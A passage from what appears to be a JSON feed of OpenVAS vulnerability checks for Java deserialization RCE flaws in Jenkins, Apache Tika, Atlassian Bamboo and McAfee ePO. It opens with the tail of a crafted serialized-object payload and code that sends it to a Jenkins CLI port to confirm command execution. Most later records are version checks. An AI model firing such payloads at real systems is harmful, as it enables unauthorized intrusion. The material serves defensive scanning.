0x00,0x00,0x00,0x78,0x71,0x00,0x7e,0x00,0x39,0x78,0x71,0x00,0x7e,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x00,0x00,0x01,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,\n 0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,0x02,0x00,0x00,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,\n 0x00,0x00,0x00,0x01,0x74,0x00,0x18,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x6c,0x69,0x45,0x6e,0x74,0x72,0x79,0x50,0x6f,0x69,0x6e,0x74,0x71,0x00,0x7e,0x00,\n 0x24,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,0xe9,0x1d,0x7b,0x47,0x02,0x00,0x00,\n 0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x74,0x00,0x1d,0x52,\n 0x50,0x43,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x28,0x31,0x2c,0x77,0x61,0x69,0x74,0x46,0x6f,0x72,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x29);\n\nsend( socket:soc, data:payload );\n\nfor( i = 0; i < 3; i++ )\n{\n res = send_capture( socket:soc,\n data:\"\",\n timeout:2,\n pcap_filter: string( \"icmp and icmp[0] = 8 and dst host \", this_host(), \" and src host \", get_host_ip() ) );\n\n if( res && ( win || vtcheck >< res ) )\n {\n close( soc );\n report = 'By sending a special crafted serialized stream it was possible to execute `' + cmd + '` on the remote host\\nReceived answer:\\n\\n' + hexdump(ddata:( res ) );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( soc ) close( soc );\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins-remoting FEDORA-2016-93679a91df", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872446", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872446", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins-remoting FEDORA-2016-93679a91df\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872446\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 05:48:14 +0100 (Tue, 07 Mar 2017)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins-remoting FEDORA-2016-93679a91df\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins-remoting'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins-remoting on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-93679a91df\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XKRLBXFPKTEBV4JI66GC2KQDE3TLZMYR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins-remoting\", rpm:\"jenkins-remoting~2.62.3~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:17:20", "description": "This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.", "cvss3": {}, "published": "2017-01-30T00:00:00", "type": "openvas", "title": "Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-10-17T00:00:00", "id": "OPENVAS:1361412562310108062", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108062", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108062\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2016-9299\");\n script_bugtraq_id(94281);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-30 13:00:00 +0100 (Mon, 30 Jan 2017)\");\n\n script_name(\"Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2016-11-16/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/94281\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an Jenkins allowing to transfer a serialized Java object to the Jenkins CLI,\n making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading\n to code execution, bypassing existing protection mechanisms.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of\n the affected application. Failed exploits will result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Jenkins LTS 2.19.2 and prior, Jenkins 2.31 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Jenkins to 2.32 or later / Jenkins LTS to 2.19.3 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"2.19.3\" ) ) {\n vuln = TRUE;\n fix = \"2.19.3\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"2.32\" ) ) {\n vuln = TRUE;\n fix = \"2.32\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:27", "description": "The host is installed with Apache Tika Server\n and is prone to arbitrary Java code execution vulnerability.", "cvss3": {}, "published": "2018-06-20T00:00:00", "type": "openvas", "title": "Apache Tika Server Java Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6809"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813537", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813537", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tika Server Java Code Execution Vulnerability\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tika\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813537\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2016-6809\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-20 17:03:55 +0530 (Wed, 20 Jun 2018)\");\n script_name(\"Apache Tika Server Java Code Execution Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Apache Tika Server\n and is prone to arbitrary Java code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to Apache Tika Server\n invoking JMatIO to do native deserialization.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary Java code for serialized objects embedded in\n MATLAB files.\");\n\n script_tag(name:\"affected\", value:\"Apache Tika Server from versions 1.6 to 1.13\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Tika Server 1.14 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_xref(name:\"URL\", value:\"https://lists.apache.org/thread.html/93618b15cdf3b38fa1f0bfc0c8c7cf384607e552935bd3db2e322e07@%3Cdev.tika.apache.org%3E\");\n script_xref(name:\"URL\", value:\"https://tika.apache.org\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_tika_server_detect.nasl\");\n script_mandatory_keys(\"Apache/Tika/Server/Installed\");\n script_require_ports(\"Services/www\", 9998, 80);\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!tPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:tPort, exit_no_version:TRUE)) exit(0);\ntVer = infos['version'];\ntPath = infos['location'];\n\nif(version_in_range(version:tVer, test_version: \"1.6\", test_version2: \"1.13\"))\n{\n report = report_fixed_ver(installed_version:tVer, fixed_version:\"1.14\", install_path:tPath);\n security_message(data:report, port:tPort);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins FEDORA-2016-93679a91df", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872442", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872442", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins FEDORA-2016-93679a91df\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872442\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 05:48:08 +0100 (Tue, 07 Mar 2017)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins FEDORA-2016-93679a91df\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-93679a91df\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZE7XYOLIPAJFIIPWZPAVZYEAOAT6LHIJ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins\", rpm:\"jenkins~1.651.3~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:30", "description": "The host is installed with Atlassian Bamboo\n and is prone to remote code execution vulnerability.", "cvss3": {}, "published": "2016-02-19T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Remote Code Execution Vulnerability Feb16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8360"], "modified": "2018-11-21T00:00:00", "id": "OPENVAS:1361412562310807275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807275", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_remote_code_exec_vuln.nasl 12455 2018-11-21 09:17:27Z cfischer $\n#\n# Atlassian Bamboo Remote Code Execution Vulnerability Feb16\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807275\");\n script_version(\"$Revision: 12455 $\");\n script_cve_id(\"CVE-2015-8360\");\n script_bugtraq_id(83111);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 10:17:27 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-19 10:03:11 +0530 (Fri, 19 Feb 2016)\");\n script_name(\"Atlassian Bamboo Remote Code Execution Vulnerability Feb16\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Atlassian Bamboo\n and is prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in a resource\n that deserialised arbitrary user input without restriction.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary java code.\");\n\n script_tag(name:\"affected\", value:\"Atlassian Bamboo 2.3.1 through 5.9.9\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 5.9.9 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-17101\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n script_xref(name:\"URL\", value:\"https://www.atlassian.com/software/bamboo\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!bambooPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!bambooVer = get_app_version(cpe:CPE, port:bambooPort)){\n exit(0);\n}\n\nif(version_in_range(version:bambooVer, test_version:\"2.3.1\", test_version2:\"5.9.8\"))\n{\n report = report_fixed_ver(installed_version:bambooVer, fixed_version:\"5.9.9\");\n security_message(data:report, port:bambooPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:22", "description": "This host is installed with McAfee ePolicy\n Orchestrator and is prone to an arbitrary code execution vulnerability.", "cvss3": {}, "published": "2016-09-01T00:00:00", "type": "openvas", "title": "McAfee ePolicy Orchestrator Arbitrary Code Execution Vulnerability Sep16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8765"], "modified": "2018-11-15T00:00:00", "id": "OPENVAS:1361412562310809026", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809026", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mcafee_epolicy_orchestrator_arbitrary_code_exec_vuln_sep16.nasl 12359 2018-11-15 08:13:22Z cfischer $\n#\n# McAfee ePolicy Orchestrator Arbitrary Code Execution Vulnerability Sep16\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mcafee:epolicy_orchestrator\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809026\");\n script_version(\"$Revision: 12359 $\");\n script_cve_id(\"CVE-2015-8765\");\n script_bugtraq_id(85696);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-15 09:13:22 +0100 (Thu, 15 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_name(\"McAfee ePolicy Orchestrator Arbitrary Code Execution Vulnerability Sep16\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_mcafee_epolicy_orchestrator_detect.nasl\");\n script_mandatory_keys(\"mcafee_ePO/installed\");\n script_require_ports(\"Services/www\", 8443);\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/576313\");\n script_xref(name:\"URL\", value:\"http://www.mcafee.com/uk/products/epolicy-orchestrator.aspx\");\n\n script_tag(name:\"summary\", value:\"This host is installed with McAfee ePolicy\n Orchestrator and is prone to an arbitrary code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an insecure deserialization of data\n in apache commons collections.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers\n to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"McAfee ePolicy Orchestrator version 4.6.x through\n 4.6.9, 5.0.x, 5.1.x before 5.1.3 Hotfix 1106041 and 5.3.x before 5.3.1 Hotfix 1106041\");\n\n script_tag(name:\"solution\", value:\"Apply the hotfix 5.1.3 Hotfix 1106041 and\n 5.3.1 Hotfix 1106041 as mentioned in the reference link.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!mcaPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!mcaVer = get_app_version(cpe:CPE, port:mcaPort)){\n exit(0);\n}\n\nif(version_in_range(version:mcaVer, test_version:\"4.6.0\", test_version2:\"4.6.9\") ||\n version_in_range(version:mcaVer, test_version:\"5.0.0\", test_version2:\"5.1.3\") ||\n version_in_range(version:mcaVer, test_version:\"5.3.0\", test_version2:\"5.3.1\")){\n report = report_fixed_ver(installed_version:mcaVer, fixed_version:\"Apply the appropriate Hotfix\");\n security_message(data:report, port:mcaPort);\n}\n exit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:09", "description": "Mageia Linux Local Security Checks mgasa-2016-0137", "cvss3": {}, "published": "2016-05-09T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0137", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8103"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310131309", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131309", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0137.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131309\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:18:11 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0137\");\n script_tag(name:\"insight\", value:\"Updated apache-commons-collections packages fix security vulnerability: Due to an issue with serialization, Java applications can be vulnerable to malicious remote code execution when the apache-commons-collections library is on the classpath (CVE-2015-8103).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0137.html\");\n script_cve_id(\"CVE-2015-8103\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0137\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.2~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:17", "description": "Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource.", "cvss3": {}, "published": "2017-10-11T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6576"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310113012", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113012", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_rce_vuln1.nasl 11863 2018-10-12 